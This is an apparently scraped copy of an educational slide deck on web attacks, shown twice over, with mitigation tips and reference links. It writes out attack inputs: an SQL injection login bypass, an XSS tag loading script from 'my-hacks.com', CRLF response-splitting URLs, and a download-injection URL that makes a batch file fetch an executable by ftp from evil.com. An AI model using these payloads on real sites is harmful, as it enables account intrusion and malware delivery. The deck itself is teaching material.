Trendy Web Security
This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA
Overview
Download & View Trendy Web Security as PDF for free.
More details
- Words: 373
- Pages: 38
Trendy Web Security
A Review of times past
SQL Injection
password ' OR 1=1; --
Parses as: SELECT username FROM users WHERE username = 'username' and password = '' OR 1=1
And you're in...
Cross Site Scripting (XSS)
About-Me field I enjoy long walks on the beach, and <script src="http://my-hacks.com/owned.js">
Now, you have your code running in another guy's browser
Have your code change his linksys' DNS settings?
SQL Injections and XSS attacks are old news.
What's new(er)?
Click Jacking
A Demo...
No JS Needed!
Cross Site Request Forgery
You are now logged out of google.
Or... had your domain stolen
• CSRF Creates a new Gmail Filter which forwards certain emails
• Hacker sends an email forwarded to your host, asking for a transfer + unlock
• Hacker transfers your domain away.
HTTP Response Splitting
/redir_lang.jsp?lang=English /redir_lang.jsp?lang=foobar%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/ 1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aContentLength:%2019%0d%0a%0d %0aShazam
HTTP/1.1 302 Moved Temporarily Date: Wed, 24 Dec 2003 15:26:41 GMT Location: http://10.1.1.1/by_lang.jsp?lang=foobar Content-Length: 0 HTTP/1.1 200 OK Content-Type: text/html Content-Length: 19 Shazam Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT 2003 271009 with Content-Type: text/html Set-Cookie: JSESSIONID=1pwxbgHwzeaIIFyaksxqsq92Z0VULcQUcAanfK7In7IyrCST9Us S!-1251019693; path=/ Connection: Close302 Moved Temporarily
Why? • Cache Poisoning • Replace content • Phishing • XSS • etc.
File Download Injection
An similar idea to response splitting
We've all written download scripts: download.php?file=report.xls
$filename = basename($_GET["download"]); header('Content-Disposition: attachment; filename="' . $filename . '"'); readfile(basename($_GET["download"])); return;
http://[trusted_domain]/download.php?file=attack.bat%0d %0a%0d%0aecho%20get%20/pub/winzip/wzinet95.exe|ftp%20-A %20evil.com%0d%0awzinet95.exe
HTTP/1.1 200 OK Date: Thu, 27 Mar 2008 05:02:24 GMT Server: Apache Path=/download Content-Disposition: attachment;filename=attack.bat Content-length: 88 echo get /pub/winzip/wzinet95.exe|ftp -A evil.com awzinet95.exe Content-Length: 0 Content-Type: application/octet-stream;charset=euc-kr
It's a dangerous world...
How about some Mitigation
As a user Sensitive stuff in separate browser?
As a programmer: Whitelist everything. Nothing gets through w/o you knowing
As a programmer: GET vs. POST. Use them correctly.
Download Injection: Use the real file name, and not the http argument
ClickJacking NoScript has a "Forbid iframe" feature
Links •
http://it.slashdot.org/article.pl?sid=08/09/25/1955228&from=rss
•
http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
•
http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
•
http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042358.html
•
http://www.webappsec.org/lists/websecurity/archive/2008-04/msg00003.html
•
http://www.aspectsecurity.com/documents/Aspect_File_Download_Injection.pdf
•
http://www.breakingpointsystems.com/community/blog/clickjacking
•
http://en.wikipedia.org/wiki/Cross-site_request_forgery
•
http://www.davidairey.com/google-gmail-security-hijack/
•
http://www.cyberciti.biz/tips/firefox-stop-clickjacking-attack.html
A Review of times past
SQL Injection
password ' OR 1=1; --
Parses as: SELECT username FROM users WHERE username = 'username' and password = '' OR 1=1
And you're in...
Cross Site Scripting (XSS)
About-Me field I enjoy long walks on the beach, and <script src="http://my-hacks.com/owned.js">
Now, you have your code running in another guy's browser
Have your code change his linksys' DNS settings?
SQL Injections and XSS attacks are old news.
What's new(er)?
Click Jacking
A Demo...
No JS Needed!
Cross Site Request Forgery
You are now logged out of google.
Or... had your domain stolen
• CSRF Creates a new Gmail Filter which forwards certain emails
• Hacker sends an email forwarded to your host, asking for a transfer + unlock
• Hacker transfers your domain away.
HTTP Response Splitting
/redir_lang.jsp?lang=English /redir_lang.jsp?lang=foobar%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/ 1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aContentLength:%2019%0d%0a%0d %0aShazam
HTTP/1.1 302 Moved Temporarily Date: Wed, 24 Dec 2003 15:26:41 GMT Location: http://10.1.1.1/by_lang.jsp?lang=foobar Content-Length: 0 HTTP/1.1 200 OK Content-Type: text/html Content-Length: 19 Shazam Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT 2003 271009 with Content-Type: text/html Set-Cookie: JSESSIONID=1pwxbgHwzeaIIFyaksxqsq92Z0VULcQUcAanfK7In7IyrCST9Us S!-1251019693; path=/ Connection: Close
This document you requested has moved temporarily.
Why? • Cache Poisoning • Replace content • Phishing • XSS • etc.
File Download Injection
An similar idea to response splitting
We've all written download scripts: download.php?file=report.xls
$filename = basename($_GET["download"]); header('Content-Disposition: attachment; filename="' . $filename . '"'); readfile(basename($_GET["download"])); return;
http://[trusted_domain]/download.php?file=attack.bat%0d %0a%0d%0aecho%20get%20/pub/winzip/wzinet95.exe|ftp%20-A %20evil.com%0d%0awzinet95.exe
HTTP/1.1 200 OK Date: Thu, 27 Mar 2008 05:02:24 GMT Server: Apache Path=/download Content-Disposition: attachment;filename=attack.bat Content-length: 88 echo get /pub/winzip/wzinet95.exe|ftp -A evil.com awzinet95.exe Content-Length: 0 Content-Type: application/octet-stream;charset=euc-kr
It's a dangerous world...
How about some Mitigation
As a user Sensitive stuff in separate browser?
As a programmer: Whitelist everything. Nothing gets through w/o you knowing
As a programmer: GET vs. POST. Use them correctly.
Download Injection: Use the real file name, and not the http argument
ClickJacking NoScript has a "Forbid iframe" feature
Links •
http://it.slashdot.org/article.pl?sid=08/09/25/1955228&from=rss
•
http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
•
http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
•
http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042358.html
•
http://www.webappsec.org/lists/websecurity/archive/2008-04/msg00003.html
•
http://www.aspectsecurity.com/documents/Aspect_File_Download_Injection.pdf
•
http://www.breakingpointsystems.com/community/blog/clickjacking
•
http://en.wikipedia.org/wiki/Cross-site_request_forgery
•
http://www.davidairey.com/google-gmail-security-hijack/
•
http://www.cyberciti.biz/tips/firefox-stop-clickjacking-attack.html
Related Documents
Trendy Web Security
November 2019 3
Web Security
May 2020 25
Web Security
November 2019 33
Nikkei Trendy
June 2020 3
Web Security Checkout
November 2019 13